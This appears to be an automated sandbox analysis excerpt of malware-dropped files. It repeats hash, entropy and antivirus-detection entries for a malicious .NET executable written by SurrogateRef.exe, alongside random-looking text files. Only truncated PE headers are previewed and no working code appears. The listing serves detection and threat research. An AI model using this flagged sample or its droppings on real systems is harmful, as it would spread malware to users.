              Preview:Ldfl5zdJHgX95bnIGCR8zpAvxlWFrnX9KUkX1pXKa4WaJxAWs7zUuqkgduyTdYcdJYyk1QRapGh5Tkl9lAWtyDOduD4H1DrCc2Qv8ZecqYonJoM2IysdBsoGKV0yVJilZfdaT0BLf4DaYkUF0B9DUNAtNKknjqGgzCNnLwjRxh7HpOsjBu7UKfQLetMJPXlzxgkVXq4EbrQxQ3E9bBmyswVUvBJbjaBZ5IUIoXMU032dPd5kpNrOvxGAKQjVhceBp02Ij6VEzR8z42FSGiwWsxnIBT7Yx1xXY0xYlxBs2nZdyQGSKQP8qHT2NtGP96Q8ekaDErrSgDeFYKTuMoNglyrRh5K1qvt5Wb9NzCNdj6cmnNeCaVCUtuWq3JgJg0muUjt6LF4Kbt7pWFnTbIbUsYLmESUqfD7tTrREeh1Ua23Aw
              Process:C:\comcontainer\SurrogateRef.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):1515008
              Entropy (8bit):7.209972232078563
              Encrypted:false
              SSDEEP:24576:Vbux7fBIcZYBhXDz9rDYe0sbT2EqdGoFKfD/M5lXVcp:Vbux7bKPRse0mTnqfELMJ
              MD5:A730EA6D448D235275000CF8ADA09A96
              SHA1:D1471DA18D3BFB0C4E8116270C1A92F3A40AE75F
              SHA-256:DAFE1BC5AD53B430E73D755268355F7B4B9AFAF65E592DFC7A8A841D0DF75B03
              SHA-512:25012A0EC68AC77DE8B0132B502DE4CC486EDB9868905344513E83CA235FA7E1FDB29BB93DE2A7B3627EED76018961AC30C3C272E14DD67244AFEB2B3FAD073D
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 88%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ... ....@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\comcontainer\SurrogateRef.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):1515008
              Entropy (8bit):7.209972232078563
              Encrypted:false
              SSDEEP:24576:Vbux7fBIcZYBhXDz9rDYe0sbT2EqdGoFKfD/M5lXVcp:Vbux7bKPRse0mTnqfELMJ
              MD5:A730EA6D448D235275000CF8ADA09A96
              SHA1:D1471DA18D3BFB0C4E8116270C1A92F3A40AE75F
              SHA-256:DAFE1BC5AD53B430E73D755268355F7B4B9AFAF65E592DFC7A8A841D0DF75B03
              SHA-512:25012A0EC68AC77DE8B0132B502DE4CC486EDB9868905344513E83CA235FA7E1FDB29BB93DE2A7B3627EED76018961AC30C3C272E14DD67244AFEB2B3FAD073D
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 88%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ... ....@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\comcontainer\SurrogateRef.exe
              File Type:ASCII text, with very long lines (918), with no line terminators
              Category:dropped
              Size (bytes):918
              Entropy (8bit):5.901198583186131
              Encrypted:false
              SSDEEP:24:Z4ZzSF95/gXg/a+JgapNL+wu6HT1+B+X3PZMVkjfXck:Z41SmXYg0Xpzi2hwkjvP
              MD5:3981D680F9BE7801918D4C630C02FE47
              SHA1:DAEB47205C60AF462C7F926FCB2F5E7F1DA8A21B
              SHA-256:B6E0D403AA16E15EF1FFE2395EBBD996C1EDC5890C764C086460651A2FD9EC49
              SHA-512:5BA41F61D05F61E175091BD5CCF8A44DCBBD5BF70E66A6D1680482BF8F9E4F1C6BE8973E3D4DD2474F091B4131A19A08B14CD2610A7548411EAA861CFAD97B2B
              Malicious:false
              Preview:VlaIeqmoQDrD2MR9fpB04AhsZijHJvFL2m9i9WBDTNYJ5VA9jAByGHAVDrt6Hfef8gKQMs9In8hqlYwDijhJtREulofSnF5yt3KZKtw0A3KIkTto4pXh8UvqbaohNrfiCt7rNW2ywqI0H6KS40X7rY0YHe8uFOnSXmF1VCahxjuRM5jeQWnXUh0o3jktYIthDzcf0S62ZzKIniMM4detlP8zvb8wbqJozMNWcEo7Zu7eXrBUWXz4nA6x0mtZUJatqfSaUzuzzhT1SecEanZE0PAzQZfzVPmPTOy2Yk9gnAEGqFfWKp9ruW2bedJ5U4ek5EhEqjpzo2a0K4JL4IoqQ4f7VXX5aEMtgeLlibqkAJD15BQkT8ALPyUAjjsSMtYjqrUpthndcDqG1oBUGxlcEAdsKKC8sXYQvdLOql1wVhtLINJ5hYMZH5fpOmfieouEpZUXcxnf6zGgRRk6BHaUL9Iz8f9EGTRrwpgs2vcuurdSy8X6CigWNa3qQfZ7xiYmhZumv1DQpqjdg0A9IDBhw5dWv0bXWe6LS0uYNvLLePqg0ZJaeZzuh10m6Y04Zq3KuYKqFlwW10ChO6fWqB27pLobAHcz5QvyVfwcOdU2nc3qySY92eOYx6fittq8J6bkFOLsKDHMrAUMS8mrtc6bCWBZANsfxWtqBSkkHqyzWCrxmSQvH9OqA9hsMwr7UmYUQoL9XBjDoGEApOws77XyHCpBu1YV81eunWg8GQXGZLC35hD8999XOjNN8JOgnNEwmUXSrylqkRZ6AvGNyZW81HfDJS97B1cMGQRkKuRLYSx7KQNNDBrN1G4ezTJYyopsyM0udfDDILkjUi23Fw3AJPUAVxv0l2WunEI8acth7nFqfVKQbQTBuojj20YqtMcQy05QZ4cmCVCfKoeAmeZUiU
              Process:C:\comcontainer\SurrogateRef.exe
              File Type:ASCII text, with very long lines (745), with no line terminators
              Category:dropped
              Size (bytes):745
              Entropy (8bit):5.886827601966164
              Encrypted:false
              SSDEEP:12:BkvXBl1kAKDTkmLIZsmCsRWg1iAMALOOnJZhUkIPlq0YLUEh87at88bbDkdqMvF+:BgkAKvkmUZsK3ooLOuJeqHh8sbbDOqMs
              MD5:1EE17F0F0DF12674CF2D48873F5F6FCA
              SHA1:BFAD3DC16570F47AE1B0A3E26EFFC433ACEDFA84
              SHA-256:7DDD4D009EA2DD6F2CE933F8B3D34F11978E0B002D180D33869ED56A268EB6FC
              SHA-512:C9CFF69330D926F0F478D8BC75BCFFC59689AA3659CE7B7523D6E53C097BAAF6DF5612EB6A6D55272730DD3AD5DCA730646C9FD20FC2223F8DCE27DB03F74FCF
              Malicious:false
              Preview:2kvkXStyFwaRAIoorh8TaqQvx9EcLNpWj7jQ58XAJnWcY6M3GrsvTETMT9wXORm1GEsCjYssJ7KwTyW1xKVee4CeoX76L9w2BeVUNJUs9AmW3g2fm5kD5IXMBNXLavgJKRvzcCnnzmfeSqkIebTQZs63HJS9vIRNdcLmvDCkR7OSn24VmPr9bQucV1rStn1qVRBzf8XbZt9beoQOP7XgbSwNstR3Vu0nFh7V1E0n2PjsQS7qlcDvQVOCfyGwreFo2WV6q4XKHtnMsD6avkR3rFWuS50D8E5YJ5z46B9qF2ngrCTb1qAHMM7x9lnvETMDxPCxOBdukkxyb0DQmZLRDyL77C5VXNmvpksbAfNzMQgmYIVJhXJoI5A9EE0LGHWW7CJ1HlQGMVEwSjjyqvxAE8nujtX5oBtF3JoW9eB6HCcw0NqefBfUUWS9YYRXNUbKm92J5MzMu12Bf14WD3ZngYuh0o8kMoswlRJ0UhjSMSkcdQege5UU4yoOOVSQOO9FIGaNsDBgTHaNxSDjKbFRUY1wm5l9OSE8SfUX0Qyb3yAxYba6RsGwIrvuOokwbCRBCb4S8qt3moYgXEXLeprfMRzltjIMpB91g9u6gI8l9MKeTPWKQYSwUvyvmTiYhhOlog9YTapWqGgAHVReM85QtNgvL9UNjkEc7izxP81zt6GOPxnQCELil72b9ONTGcxGBDCigePOHFhwGSgXVELfYf0AqXxBuhtRJAMLuFuhy
              Process:C:\comcontainer\SurrogateRef.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):1515008
              Entropy (8bit):7.209972232078563
              Encrypted:false
              SSDEEP:24576:Vbux7fBIcZYBhXDz9rDYe0sbT2EqdGoFKfD/M5lXVcp:Vbux7bKPRse0mTnqfELMJ
              MD5:A730EA6D448D235275000CF8ADA09A96
              SHA1:D1471DA18D3BFB0C4E8116270C1A92F3A40AE75F
              SHA-256:DAFE1BC5AD53B430E73D755268355F7B4B9AFAF65E592DFC7A8A841D0DF75B03
              SHA-512:25012A0EC68AC77DE8B0132B502DE4CC486EDB9868905344513E83CA235FA7E1FDB29BB93DE2A7B3627EED76018961AC30C3C272E14DD67244AFEB2B3FAD073D
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 88%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ... ....@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\comcontainer\SurrogateRef.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):1515008
              Entropy (8bit):7.209972232078563
              Encrypted:false
              SSDEEP:24576:Vbux7fBIcZYBhXDz9rDYe0sbT2EqdGoFKfD/M5lXVcp:Vbux7bKPRse0mTnqfELMJ
              MD5:A730EA6D448D235275000CF8ADA09A96
              SHA1:D1471DA18D3BFB0C4E8116270C1A92F3A40AE75F
              SHA-256:DAFE1BC5AD53B430E73D755268355F7B4B9AFAF65E592DFC7A8A841D0DF75B03
              SHA-512:25012A0EC68AC77DE8B0132B502DE4CC486EDB9868905344513E83CA235FA7E1FDB29BB93DE2A7B3627EED76018961AC30C3C272E14DD67244AFEB2B3FAD073D
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 88%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ... ....@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\comcontainer\SurrogateRef.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):151
              Entropy (8bit):5.583567015523944
              Encrypted:false
              SSDEEP:3:w4kgf1IwdTUK2BCvBeNU0sXW5ciwC4j6Tu3h/bYDSbkP:wKywR6Bm8NyGCr/uTuR/bYZ
              MD5:EA83027624A57F21E6952588A7B37869
              SHA1:8B5EFC376FAB8016CF1CFB84FA8CEDCBF2193953
              SHA-256:6C93B97B3F3225917269C25C42787C7D7797136FDB3171498A12F955A35115B4
              SHA-512:ECE6BB9738233AC2FD4F922D8837379B2D4FC027CD6C46D75DB16E1F3E3C5A9A835B3E13C4AC938A4219D964E7A561A5D228DE95C93387DD96F083F0293218CD
              Malicious:false
              Preview:8FW5WnN2u8AQc4qC8itnnFuDGa94wSM8jm8vqoSHVjv6oKMRzWquwjf2VTz6oTFbvCq054WUQlSDUyY5NsFamcM9GFaXyVdBeTKmeWV49WeKRcig44s5OpzTzrtze9f4IQjAowa1WKaQ7Brnh3c3nhx
              Process:C:\comcontainer\SurrogateRef.exe
              File Type:ASCII text, with very long lines (603), with no line terminators
              Category:dropped
              Size (bytes):603
              Entropy (8bit):5.9041775587444985
              Encrypted:false
              SSDEEP:12:HnXZnWD183GVKjk54fYAaDvOicBWgigvnc7TQitl826quYpgqR63isz:HpnWe3GV4SXOiali+nuTD7VwFz
              MD5:D1C4D416CBA30C983A7FEE03FD8F7882
              SHA1:CB1646AF147A365C42572B317C910D94421B2244
              SHA-256:3CF334B465D35E9F230B3504D371F46B7343E4945C4182D4623339D52FC8E30F
              SHA-512:69B9E488B1DF2A7168257F4B243DD79B3D8E6C60395BDE5F139641EB4FB812BA26F72A27C7148A1BB0208FEF5DEF4E8956BCF087FB3476875AF97362F40C64F1
              Malicious:false
              Preview:BuvrESc88FsNE236I4yv4MD2iZibiwAIc63Vm6dYOyTu1cyGme1QN6qyr3JptAZLFjuI8iTMaahG2SBFkczE5t5gPEntwxoNYHoRspHELo0xYj6Y2DERLVQWoN244jamvUruntX5Uu3Q2IHqIP1stXBC1SnewNJlONBE1LuIqJ6ac9dfGMvpsr3YSp3VF3IHlRCpGCy7esCkbkj1zHXkbe2hUnwMSZDwAyzK7yZDYyKAoT6rFBf7fipGZfUcQmoFoQjmvY4BsULnU22AqFHQ3FQbJsvcd6xwJEVYtU6qGePLWCwgmTwKfYMj9HdCncivgZdPhdRWIaKZ0EFG6OzJKmRv2wZl03Do6dp6ig9JCZBENxs4CWFYmYl3IsXvEpfOXfcXZIiaPqGukMhFDejeyoBh1vy0INEX4wqrUVf4ypI6R0S6KSrkFBase5fnTrRBlt0xfzvs8opIgEPAd2p0geR2W8NYz1kGYGViAeaVh9lbWRMZpeKbCafGc7bhmW2GEiuZtrA8bUTg20gEvxsVrIE8lOGCD2sKHfWxhxq8eM9rG9OlbXvyngZ5dwxek75ilIYXdtg8Ht1eJX1m9elqH4gkFbT
              Process:C:\comcontainer\SurrogateRef.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):1515008
              Entropy (8bit):7.209972232078563
              Encrypted:false
              SSDEEP:24576:Vbux7fBIcZYBhXDz9rDYe0sbT2EqdGoFKfD/M5lXVcp:Vbux7bKPRse0mTnqfELMJ
              MD5:A730EA6D448D235275000CF8ADA09A96
              SHA1:D1471DA18D3BFB0C4E8116270C1A92F3A40AE75F
              SHA-256:DAFE1BC5AD53B430E73D755268355F7B4B9AFAF65E592DFC7A8A841D0DF75B03
              SHA-512:25012A0EC68AC77DE8B0132B502DE4CC486EDB9868905344513E83CA235FA7E1FDB29BB93DE2A7B3627EED76018961AC30C3C272E14DD67244AFEB2B3FAD073D
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 88%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ... ....@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\comcontainer\SurrogateRef.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):1515008
              Entropy (8bit):7.209972232078563
              Encrypted:false
              SSDEEP:24576:Vbux7fBIcZYBhXDz9rDYe0sbT2EqdGoFKfD/M5lXVcp:Vbux7bKPRse0mTnqfELMJ
              MD5:A730EA6D448D235275000CF8ADA09A96
              SHA1:D1471DA18D3BFB0C4E8116270C1A92F3A40AE75F
              SHA-256:DAFE1BC5AD53B430E73D755268355F7B4B9AFAF65E592DFC7A8A841D0DF75B03
              SHA-512:25012A0EC68AC77DE8B0132B502DE4CC486EDB9868905344513E83CA235FA7E1FDB29BB93DE2A7B3627EED76018961AC30C3C272E14DD67244AFEB2B3FAD073D
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 88%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ... ....@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\comcontainer\SurrogateRef.exe
              File Type:ASCII text, with very long lines (641), with no line terminators
              Category:dropped
              Size (bytes):641
              Entropy (8bit):5.874527234121219
              Encrypted:false
              SSDEEP:12:0qbUsmDDmFvRod+9DNzJtpdzxYpYGAuwIEgXJ9MvZUfnGV7iGgA1:0qPzAINhJtpdzWYGAbIECuvyOX9
              MD5:B423EC42CFBDFBD755C713543E08549A
              SHA1:645DE815DB50695C33DAB23CF489366F8F86F331
              SHA-256:4E64D474B8EA67DE8752B993699AE830144B71EB00F0ACCED67CB4A30FFF323C
              SHA-512:96D61B3C9EA8C77C0228E27598A1E80BD6B2D5F09CC26774E128CA9F1DDFF4D91771CE3EAD053D1D999B0774B55CE9AD85FFFD86A1D7DF62EB57670356201EF0
              Malicious:false
              Preview:qRIvufPiEfLhRs64pLG4YduAUBzihBSJn7GidomSycXcsuvwNXnACEOMhHbtprADNB4TmXbBixG6GRRkPCUJXSHis3BVM3nHbUPrzbKz6mbP7SGP00dnW0p44WksWFypK9evBkux2fMu02kawvfWZAukoUxd0bd1ywE8yUNPFqu1o4DBvK5kkbPJO3GrxR6aBV6ExmlchPQtP36uQvrpf3RWg4t4NgcytU0S89NJjdCULf4V6WaBjQ4HEji22rOBwcA4DowRhiGC16LBAY81FaOcZsNYaVQ2PAhse9RSkJeBK2QIYh2dsW5WOifVbY0MROw0YcgAHqR66NShcF93cxJ2FLe6e61LSSt5GZu6B2WCF8aAQ82WZ7teF3vM7jgKyFondWbDUC2kaGxGvdqgDewUiOzMnh9bVLN9Uwh3gzBWFJD9Gpad39HTSTFPgOZxDaOP2xv96w9OdaPYK0F8GfhVE3rBqRWRaOSo5yGT4bgGA202DrEqJaqi32L8GuSparxPHldWuwEp8aVLDy79MqI9huvCnIMJI1qTEkucNs5WWBjcg94RxTctiyrW0atlj4gGuCGcDfveuwngLTfnN5WzZ7uQ3Ymx8Uwbecre3bNSh78wLKLh4FYohqqwSzjp2
              Process:C:\comcontainer\SurrogateRef.exe
              File Type:ASCII text, with very long lines (947), with no line terminators
              Category:dropped
              Size (bytes):947
              Entropy (8bit):5.909405389269913
              Encrypted:false
              SSDEEP:24:95rCfBcn7RUAlNYEZcPjD+AW7AayqBkJb15Y9heKxqT:P2fS7HfejD+nRyqB25Y9hV+
              MD5:478484B48BBD29EF472C82C4917788EE
              SHA1:CD441FB6396ED12B11BBC3FD78274963531FEFAC
              SHA-256:FF54E971662D0338DC34D07D0D47D6C50034091518205CF9FF6C786D1D96BCC3
              SHA-512:7CFC799BC463D4683BD12972C1368ADCC9E9885C83CB982591B7B7D252F2E1D47753A4B3014C9803783068201A2F6D239DF0114E0C46BDC644BC05FCB3E2084A
              Malicious:false
              Preview:9lN3NQz39rBxqykYc91U7OVb7Ta8j59Dy7EbufiuecJb9Dbh1vBhSJ9uQw63z0TEs79stJo6bH0fE3c322Hy3bvp8UK7jo4nIFtBEsxrHEGKSdpWUDA7sfLRMUuZ8qXwNMW9JazKEaqyUkWeoyngn74n4czt7YsbrU7GGpM3N02SyW6l8PuKC0IPRtFrlGNqrPG9nPX8ltSxEmyhfNurniY1MrzXjfSHnMljQ78t2wiThULp4iLXVfCJ1Px5aAYGbLJ2APQhPBz19FT1gKcBT5wHJcrAKCT1Xc2WLTopRnIUqLJw55ZPhXxfYBshhQXMs7dhN6qNfwtpwbb8T5EOnDT9oW7JkGHBQ6lsrlj9PMuunHt7kuOlLIipnd209hmYpsY00tQrWF9bSiWgmAiz1gzHX6FNts9rjVF5s3G1dhOFIHWEHWO88whJ2Rc3oD7oGR27dbxt3rWTRu9QkAGXdAtwy6CbaNMajk90PYlqifFQaN1IRLSn7kKFiFJgYVSpe5tquIBLYZy85cVkE4KP5jd9Z4SJPFRMMZvfdLYJKGPhwMJGuibeLDu5cuRz026THlvfq0H3gAEyU5MMuMYqnxAJo0Ds3iTSK5ZKanZ4bh8L86lghEFndPqUll10xYA7rwoYgCwGwePFzzLsPgKycpy4PFjywjGChAdMSM9fS819AkfvaIlQNLeB7tJad7TNXMiyV8aChpgeyz3pjxXo80zVfcOiDiBUonlxCqZcsithpANIze1pjpPhXMT3u198oLzKOGm3Y55ZHRqeOGtirVu9YDazXfr1jv3dKD4t17RotzaFfypoIaQSa0vKpxf3NE0WYNTLL9ruEGQinUTj0DsIekCURuDEcXao9DrSeecItgOUkNgVd6CKVs1yK93b5nRqqljjnBFVlkY8VsuENskfVQSRM3IfkBMGOhn8n6sc1rivT3c
              Process:C:\comcontainer\SurrogateRef.exe
              File Type:ASCII text, with very long lines (893), with no line terminators
              Category:dropped
              Size (bytes):893
              Entropy (8bit):5.895920661511299
              Encrypted:false
              SSDEEP:24:Byv7HVUAaFiGCKl9MHL4qC57xmj9l8Rg0n3mkj9OX:MHeJijKKL4qCR89l+z3mQOX
              MD5:469CEFB26FCEAC8D9D31CBBB64703EA4
              SHA1:2A9FCED8E5CDED9546AB47779C49E8278B471052
              SHA-256:4B7F7FC6595970DD3673903D1F0547D6D626F15F1085D44D1703E62549E7A0ED
              SHA-512:C67C4DD180895B1382FFE45BD89A0C95D1F0ACE1EA688921F092C661EE26F08E82336A3FCD6031DE1142A5C0246A25DC09AAAF4CF2374C14CA01C2F659DCB14A
              Malicious:false
              Preview:h2Hd1jDPjVy9FSlgmQkcugxAnO0uaZX9qu9AVZv8tj5f8xgNydOTbiIBFH0msTyJ7ySVSkLMemsLlSBzsn56LEhIm85NjJPauvhJfL5OSCyzz6awFA4FX283QJtTo7mVWSbzu2UgrrnJPsTpiIIjOKD1wo3WcljUZcchfkBNqXXqOzni0DufzDGMOjCG88EFHTtxPwJ8G430wXn7AVfY1DfWVQS5h5OsTRi5F0SD4wY4JQZ16FGncqODxXb9dNaLqLhfyr1JDbdEplMF1b9cylPmDfIsZTkqWNN8s3DON6kAMJYLKVHCO7WF54cSjJut1xscXNX7XuP2APZ3H6hDLhbY0IDxbupEM0IZb6y68JoeseEpfiLnlqiUVUmOKjgnEKqKHAbKIkFC27pVEXS2iCdfSyDHUjwZnBZhy3ieGAeAkfbYoQKwQnECrK2S7U0iyqY0iHhKzyvihc4wXpcDY9IA7W0nBPhwK6L4Hk0gt97c1gfOPF5S2xKziY3LR3IjQ9XlRApwy5UYCpJa1lX6UP3WvWVsqoPz1XL1I47PaId6cvw3PcUqfMPBGBz4o7GKqehodRS7nIfLv64AjccNUjToHKvHEDkdCTQ7NIZ7KWCXqEQJGyVLe2zHL3gTgL2khCIcq6xbDeD7g57D4mAPsZ8KdJwUlGb9ec0n5xcKB3I9y2kP5dZ4Km2ID78hJc06DEdEFUHGJzNyQ9WljhYHrhy1jsj8z5AjDL5uYfJlVSuUZD1ElW8mDsPgPleXuJQOyovFDlMDXxvYwdcf1fWc7YfU6ZexAw0MCgguSvA9K4PP70twJ9gOwyQaJaIoHZCk7jWQ7sNFfWSCIPXFqsoBQmZNPFk1nV2u2oSYecybvatZgNR4DC7ZvAUVJIB1H
              Process:C:\comcontainer\SurrogateRef.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):1515008
              Entropy (8bit):7.209972232078563
              Encrypted:false
              SSDEEP:24576:Vbux7fBIcZYBhXDz9rDYe0sbT2EqdGoFKfD/M5lXVcp:Vbux7bKPRse0mTnqfELMJ
              MD5:A730EA6D448D235275000CF8ADA09A96
              SHA1:D1471DA18D3BFB0C4E8116270C1A92F3A40AE75F
              SHA-256:DAFE1BC5AD53B430E73D755268355F7B4B9AFAF65E592DFC7A8A841D0DF75B03
              SHA-512:25012A0EC68AC77DE8B0132B502DE4CC486EDB9868905344513E83CA235FA7E1FDB29BB93DE2A7B3627EED76018961AC30C3C272E14DD67244AFEB2B3FAD073D
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 88%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ... ....@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\comcontainer\SurrogateRef.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):1515008
              Entropy (8bit):7.209972232078563
              Encrypted:false
              SSDEEP:24576:Vbux7fBIcZYBhXDz9rDYe0sbT2EqdGoFKfD/M5lXVcp:Vbux7bKPRse0mTnqfELMJ
              MD5:A730EA6D448D235275000CF8ADA09A96
              SHA1:D1471DA18D3BFB0C4E8116270C1A92F3A40AE75F
              SHA-256:DAFE1BC5AD53B430E73D755268355F7B4B9AFAF65E592DFC7A8A841D0DF75B03
              SHA-512:25012A0EC68AC77DE8B0132B502DE4CC486EDB9868905344513E83CA235FA7E1FDB29BB93DE2A7B3627EED76018961AC30C3C272E14DD67244AFEB2B3FAD073D
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 88%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ... ....@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\comcontainer\SurrogateRef.exe
              File Type:ASCII text, with very long lines (615), with no line terminators
              Category:dropped
              Size (bytes):615
              Entropy (8bit):5.888494500383328
              Encrypted:false
              SSDEEP:12:x6eFUPS0LFZUrWOjU0yeSjPEg04nCMjN4Xfc7jsJrInOxyPvcpBZYsHW:gnJLFOWKVyekMrMjmXMjsOOx+8d2
              MD5:0B5E3F933DF6CBC528A3F79F9FBDFC4B
              SHA1:0B9109DC1A6E6C89AB6FA4C5F27BE1BACBB13BF9
              SHA-256:7194A3DB8B1E70E094092EDB61E6105EE69A99C3FB545B649C98332CA85A7F45
              SHA-512:6AB645C692B9E8A4C950438E3C8720733E03ADABB216086D1F4E6C3CACEA1EB3C40D572FA919E2596D9DF6709DB2F44DBA572ABCBE7F85E13F84645B8287A1DC
              Malicious:false
              Preview:5k0HRiUo6o1A8UROYAGjlJmsWrDrGbq2o7BcQQh5yXwQQ938b0BhqwAw8Hvjemie88WBTz7IdKuOWWbXyFQQZJM16OdIe7bMyRRRm2pm22DfBwZmpXvZVREyweFEVyofthZFEJu5ZnXgFq0Jz1cGMC0gNdfIxkREOiweXUhgnz9s3htGo5PdVhTrq21lolIzWTRh3VveT6dWCImptYe1UxsrPExec61BqJVkPLNSJvJYE6ohPM1QGQfjlkSyhRCXFbq3xCZhLMsjnTnSaPPPEk5Zow9p3Yu2twTmQuuNxTF4i55R79YRBwSegQPADtowcz01AACpfBcvfB1s0rr49c06dzGAftJDpSctFEQ76swATh8fYgKVBtw983YK3CJv1YFMiHnwbu7Rp0m50ll9jyB5fcuLpFD4jBI5cw6R3Y4RwfTIQdURaKLDWKqGXbGVrCrosrdEpUGL4uJAIl5MvvdZzEiSFz3bRjktxpajAPmGDAJmAq7vf3j5jSynIK9zao3UKZMcLWMfJXVz56RY2I5X9oKe1wazQwqYGybkdejJrDwM78sL3k7RtfVfPrlZ6XOWq6sHfq4Xiwq528h2EO5qyYpld5Vw3KNUyZf
              Process:C:\comcontainer\SurrogateRef.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):1515008
              Entropy (8bit):7.209972232078563
              Encrypted:false
              SSDEEP:24576:Vbux7fBIcZYBhXDz9rDYe0sbT2EqdGoFKfD/M5lXVcp:Vbux7bKPRse0mTnqfELMJ
              MD5:A730EA6D448D235275000CF8ADA09A96
              SHA1:D1471DA18D3BFB0C4E8116270C1A92F3A40AE75F
              SHA-256:DAFE1BC5AD53B430E73D755268355F7B4B9AFAF65E592DFC7A8A841D0DF75B03
              SHA-512:25012A0EC68AC77DE8B0132B502DE4CC486EDB9868905344513E83CA235FA7E1FDB29BB93DE2A7B3627EED76018961AC30C3C272E14DD67244AFEB2B3FAD073D
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 88%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ... ....@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\comcontainer\SurrogateRef.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):1515008
              Entropy (8bit):7.209972232078563
              Encrypted:false
              SSDEEP:24576:Vbux7fBIcZYBhXDz9rDYe0sbT2EqdGoFKfD/M5lXVcp:Vbux7bKPRse0mTnqfELMJ
              MD5:A730EA6D448D235275000CF8ADA09A96
              SHA1:D1471DA18D3BFB0C4E8116270C1A92F3A40AE75F
              SHA-256:DAFE1BC5AD53B430E73D755268355F7B4B9AFAF65E592DFC7A8A841D0DF75B03
              SHA-512:25012A0EC68AC77DE8B0132B502DE4CC486EDB9868905344513E83CA235FA7E1FDB29BB93DE2A7B3627EED76018961AC30C3C272E14DD67244AFEB2B3FAD073D
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 88%
